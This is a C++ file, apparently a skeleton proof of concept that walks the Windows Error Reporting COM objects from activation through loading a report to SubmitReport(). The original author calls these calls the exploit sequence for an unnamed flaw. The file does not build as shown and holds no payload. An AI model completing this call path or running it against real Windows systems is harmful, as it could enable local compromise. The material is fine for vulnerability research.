#include <Windows.h>
#include <iostream>
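/// Skeleton proof-of-concept that drives the Windows Error Reporting (WER)
/// COM objects: it activates the ERC LUA support object, obtains a WER store
/// through it, loads one report by name and submits that report.
///
/// NOTE(review): IWerReport, IErcLuaSupport, IWerStoreFactory, IWerStore,
/// CLSID_ERCLuaSupport and IID_IErcLuaSupport are not declared in this listing,
/// so the file does not build as shown; the declarations presumably live
/// elsewhere. The listing also does not say which flaw SubmitReport() is
/// meant to reach, so the comments below describe only the calls themselves.
///
/// @return 0 when every step completed, 1 when any step failed.
int main() {
    // COM has to be initialised on this thread before any activation call;
    // only a successful CoInitialize may be paired with CoUninitialize.
    const HRESULT initResult = CoInitialize(NULL);
    if (FAILED(initResult)) {
        std::cerr << "CoInitialize failed: 0x" << std::hex
                  << static_cast<unsigned long>(initResult) << '\n';
        return 1;
    }

    // Interface pointers start out null so that cleanup can tell which
    // objects were actually obtained.
    IWerReport* pIWerReport = nullptr;
    IErcLuaSupport* pIErcLuaSupport = nullptr;
    IWerStoreFactory* pIWerStoreFactory = nullptr;
    IWerStore* pIWerStore = nullptr;

    // CLSCTX_LOCAL_SERVER requests out-of-process activation: the object
    // lives in a separate server process and every call below crosses that
    // process boundary.
    const HRESULT createResult =
        CoCreateInstance(CLSID_ERCLuaSupport, NULL, CLSCTX_LOCAL_SERVER,
                         IID_IErcLuaSupport,
                         reinterpret_cast<PVOID*>(&pIErcLuaSupport));
    bool ok = SUCCEEDED(createResult) && pIErcLuaSupport != nullptr;
    if (!ok) {
        std::cerr << "CoCreateInstance(CLSID_ERCLuaSupport) failed: 0x"
                  << std::hex << static_cast<unsigned long>(createResult)
                  << '\n';
    }

    // The return types of the WER interface methods are not visible here, so
    // each step is validated through the out-pointer it is expected to fill.
    if (ok) {
        pIErcLuaSupport->CoCreateIWerStoreFactory(&pIWerStoreFactory);
        ok = pIWerStoreFactory != nullptr;
        if (!ok) {
            std::cerr << "CoCreateIWerStoreFactory returned no factory\n";
        }
    }

    if (ok) {
        pIWerStoreFactory->CoCreateIWerStore(&pIWerStore);
        ok = pIWerStore != nullptr;
        if (!ok) {
            std::cerr << "CoCreateIWerStore returned no store\n";
        }
    }

    // Steps the original author labels as the exploit sequence.
    if (ok) {
        // Start enumeration of the store before loading a report.
        pIWerStore->EnumerateStart();

        // "ReportName" is a placeholder for the name of a report in the store.
        pIWerStore->LoadReport(L"ReportName", &pIWerReport);
        ok = pIWerReport != nullptr;
        if (!ok) {
            std::cerr << "LoadReport returned no report\n";
        }
    }

    if (ok) {
        // Submitting the loaded report is the call the author says triggers
        // the vulnerability.
        pIWerReport->SubmitReport();
    }

    // Release whatever was obtained, newest object first; a pointer that was
    // never filled in must not be dereferenced.
    if (pIWerReport != nullptr) {
        pIWerReport->Release();
    }
    if (pIWerStore != nullptr) {
        pIWerStore->Release();
    }
    if (pIWerStoreFactory != nullptr) {
        pIWerStoreFactory->Release();
    }
    if (pIErcLuaSupport != nullptr) {
        pIErcLuaSupport->Release();
    }

    CoUninitialize();
    return ok ? 0 : 1;
}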